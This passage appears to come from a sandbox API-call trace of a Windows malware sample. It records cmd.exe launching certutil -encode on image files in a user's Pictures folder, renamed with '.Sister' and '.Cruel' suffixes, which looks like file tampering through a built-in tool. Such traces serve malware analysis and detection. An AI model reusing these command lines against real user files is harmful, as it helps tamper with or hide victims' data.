lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0301.531] GetLastError () returned 0x2 [0301.532] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.532] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0301.532] GetLastError () returned 0x2 [0301.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.536] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd00 [0301.536] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0301.537] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0301.537] GetLastError () returned 0x2 [0301.537] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d060 [0301.537] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0301.538] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0301.538] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0301.538] ??_V@YAXPEAX@Z () returned 0x1 [0301.538] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0301.538] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0301.538] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0301.538] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0301.539] GetProcessHeap () returned 0x21ed8c70000 [0301.539] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45da0 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0301.539] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0301.540] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0301.540] GetProcessHeap () returned 0x21ed8c70000 [0301.541] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0301.541] GetProcessHeap () returned 0x21ed8c70000 [0301.541] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95780 [0301.541] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0301.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0301.541] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0301.541] _get_osfhandle (_FileHandle=0) returned 0x4c [0301.541] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0301.542] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bmp.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bmp.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x11f0, dwThreadId=0x2d4)) returned 1 [0301.567] CloseHandle (hObject=0xa4) returned 1 [0301.567] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0301.567] GetProcessHeap () returned 0x21ed8c70000 [0301.567] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0301.567] GetEnvironmentStringsW () returned 0x21ed937e320* [0301.567] GetProcessHeap () returned 0x21ed8c70000 [0301.567] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0301.568] FreeEnvironmentStringsA (penv="=") returned 1 [0301.568] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0302.214] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0302.214] CloseHandle (hObject=0xa8) returned 1 [0302.215] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0302.215] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0302.215] GetProcessHeap () returned 0x21ed8c70000 [0302.215] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0302.215] GetEnvironmentStringsW () returned 0x21ed937e320* [0302.215] GetProcessHeap () returned 0x21ed8c70000 [0302.215] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0302.215] FreeEnvironmentStringsA (penv="=") returned 1 [0302.215] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0302.215] GetProcessHeap () returned 0x21ed8c70000 [0302.215] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0302.216] GetEnvironmentStringsW () returned 0x21ed937e320* [0302.216] GetProcessHeap () returned 0x21ed8c70000 [0302.216] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0302.216] FreeEnvironmentStringsA (penv="=") returned 1 [0302.216] GetProcessHeap () returned 0x21ed8c70000 [0302.216] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95780) returned 1 [0302.216] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0302.216] ??_V@YAXPEAX@Z () returned 0x1 [0302.216] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fef870, ftCreationTime.dwHighDateTime=0x1d5e455, ftLastAccessTime.dwLowDateTime=0xb6eff3a0, ftLastAccessTime.dwHighDateTime=0x1d5f0c5, ftLastWriteTime.dwLowDateTime=0xb6eff3a0, ftLastWriteTime.dwHighDateTime=0x1d5f0c5, nFileSizeHigh=0x0, nFileSizeLow=0x10023, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="tust f-S-Eq-29XvQ_R.png.Sister", cAlternateFileName="")) returned 1 [0302.216] GetProcessHeap () returned 0x21ed8c70000 [0302.216] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45640, Size=0x296) returned 0x21ed8d45640 [0302.216] GetProcessHeap () returned 0x21ed8c70000 [0302.216] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45640) returned 0x296 [0302.216] GetProcessHeap () returned 0x21ed8c70000 [0302.216] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b1000 [0302.216] GetProcessHeap () returned 0x21ed8c70000 [0302.216] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b1000, Size=0x58) returned 0x21ed93b1000 [0302.217] GetProcessHeap () returned 0x21ed8c70000 [0302.217] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1000) returned 0x58 [0302.217] GetProcessHeap () returned 0x21ed8c70000 [0302.217] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b1070 [0302.217] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0302.217] GetProcessHeap () returned 0x21ed8c70000 [0302.217] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4e) returned 0x21ed8c7cf40 [0302.217] ??_V@YAXPEAX@Z () returned 0x1 [0302.217] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0302.217] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cd60 [0302.217] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0302.218] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cca0 [0302.218] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0302.218] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdeaad829, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdeaad829, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0302.218] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0302.218] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\tust f-S-Eq-29XvQ_R.png.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fef870, ftCreationTime.dwHighDateTime=0x1d5e455, ftLastAccessTime.dwLowDateTime=0xb6eff3a0, ftLastAccessTime.dwHighDateTime=0x1d5f0c5, ftLastWriteTime.dwLowDateTime=0xb6eff3a0, ftLastWriteTime.dwHighDateTime=0x1d5f0c5, nFileSizeHigh=0x0, nFileSizeLow=0x10023, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="tust f-S-Eq-29XvQ_R.png.Sister", cAlternateFileName="TUSTF-~1.SIS")) returned 0x21ed8c7ca00 [0302.218] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0302.219] _wcsnicmp (_String1="TUSTF-~1.SIS", _String2="tust f-S-Eq-29XvQ_R.png.Sister", _MaxCount=0x1e) returned 70 [0302.219] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0302.219] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0302.219] GetProcessHeap () returned 0x21ed8c70000 [0302.219] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bee0 [0302.219] ??_V@YAXPEAX@Z () returned 0x1 [0302.219] ??_V@YAXPEAX@Z () returned 0x1 [0302.219] GetProcessHeap () returned 0x21ed8c70000 [0302.219] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b1070, Size=0x260) returned 0x21ed93b1070 [0302.219] GetProcessHeap () returned 0x21ed8c70000 [0302.219] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1070) returned 0x260 [0302.219] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0302.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.219] GetFileType (hFile=0x50) returned 0x2 [0302.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.219] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0302.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.220] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0302.227] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0302.227] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0302.227] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0302.227] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0302.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.227] GetFileType (hFile=0x50) returned 0x2 [0302.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.227] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0302.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.242] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0302.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.243] GetFileType (hFile=0x50) returned 0x2 [0302.243] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.243] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0302.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.243] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b1010*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93b1010*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0302.244] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.png.Cruel\" ") returned 74 [0302.244] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.244] GetFileType (hFile=0x50) returned 0x2 [0302.244] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.244] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0302.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.245] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4a, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4a) returned 1 [0302.245] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0302.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.245] GetFileType (hFile=0x50) returned 0x2 [0302.245] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.245] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0302.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.246] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0302.253] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0302.254] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0302.254] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0302.254] malloc (_Size=0xffce) returned 0x21eda100000 [0302.254] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0302.254] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0302.254] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0302.254] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0302.254] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0302.254] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0302.254] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0302.255] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0302.255] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0302.255] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0302.255] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0302.255] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0302.255] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0302.255] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0302.255] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0302.255] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0302.255] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0302.255] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0302.255] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0302.255] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0302.255] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0302.255] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0302.255] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0302.255] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0302.255] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0302.255] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0302.255] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0302.255] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0302.255] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0302.255] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0302.255] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0302.255] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0302.255] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0302.256] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0302.256] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0302.256] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0302.256] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0302.256] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0302.256] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0302.256] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0302.256] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0302.256] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0302.256] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0302.256] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0302.256] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0302.256] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0302.256] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0302.256] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0302.256] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0302.256] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0302.256] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0302.256] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0302.256] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0302.256] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0302.256] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0302.256] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0302.256] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0302.256] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0302.256] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0302.256] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0302.256] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0302.256] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0302.257] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0302.257] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0302.257] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0302.257] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0302.257] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0302.257] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0302.257] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0302.257] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0302.257] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0302.257] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0302.257] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0302.257] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0302.257] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0302.257] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0302.257] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0302.257] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0302.257] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0302.257] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 